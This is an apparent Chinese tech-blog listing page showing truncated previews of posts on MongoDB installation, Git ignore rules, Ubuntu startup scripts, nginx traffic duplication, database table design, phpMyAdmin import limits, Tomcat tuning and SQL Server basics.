    一.MongoDB安装和启动,widndows和linux基本相同 1.下载数据库,     linux:mongodb-linux-x86_64-ubuntu1404-3.0.3.tgz 2.解压文件,并且放置到合适的位置     tar -vxf mongodb-linux-x86_64-ubun
  • Git排除目录 geeksun git
    在Git的版本控制中,可能有些文件是不需要加入控制的,那我们在提交代码时就需要忽略这些文件,下面讲讲应该怎么给Git配置一些忽略规则。   有三种方法可以忽略掉这些文件,这三种方法都能达到目的,只不过适用情景不一样。 1.  针对单一工程排除文件 这种方式会让这个工程的所有修改者在克隆代码的同时,也能克隆到过滤规则,而不用自己再写一份,这就能保证所有修改者应用的都是同一
  • Ubuntu 创建开机自启动脚本的方法 hongtoushizi ubuntu
    转载自: http://rongjih.blog.163.com/blog/static/33574461201111504843245/ Ubuntu 创建开机自启动脚本的步骤如下: 1) 将你的启动脚本复制到 /etc/init.d目录下 以下假设你的脚本文件名为 test。   2) 设置脚本文件的权限 $ sudo chmod 755
  • 第八章 流量复制/AB测试/协程 jinnianshilongnian nginxluacoroutine
    流量复制 在实际开发中经常涉及到项目的升级,而该升级不能简单的上线就完事了,需要验证该升级是否兼容老的上线,因此可能需要并行运行两个项目一段时间进行数据比对和校验,待没问题后再进行上线。这其实就需要进行流量复制,把流量复制到其他服务器上,一种方式是使用如tcpcopy引流;另外我们还可以使用nginx的HttpLuaModule模块中的ngx.location.capture_multi进行并发
  • 电商系统商品表设计 lkl
    DROP TABLE IF EXISTS `category`; -- 类目表 /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `category` ( `id` int(11) NOT NUL
  • 修改phpMyAdmin导入SQL文件的大小限制 pda158 sqlmysql
     用phpMyAdmin导入mysql数据库时,我的10M的 数据库不能导入,提示mysql数据库最大只能导入2M。    phpMyAdmin数据库导入出错:   You probably tried to upload too large file. Please refer to documentation for ways to workaround this limit.
  • Tomcat性能调优方案 Sobfist apachejvmtomcat应用服务器
    一、操作系统调优 对于操作系统优化来说,是尽可能的增大可使用的内存容量、提高CPU的频率,保证文件系统的读写速率等。经过压力测试验证,在并发连接很多的情况下,CPU的处理能力越强,系统运行速度越快。。 【适用场景】 任何项目。 二、Java虚拟机调优 应该选择SUN的JVM,在满足项目需要的前提下,尽量选用版本较高的JVM,一般来说高版本产品在速度和效率上比低版本会有改进。 J
  • SQLServer学习笔记 vipbooks 数据结构xml
    1、create database school 创建数据库school 2、drop database school 删除数据库school 3、use school 连接到school数据库,使其成为当前数据库 4、create table class(classID int primary key identity not null) 创建一个名为class的表,其有一
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他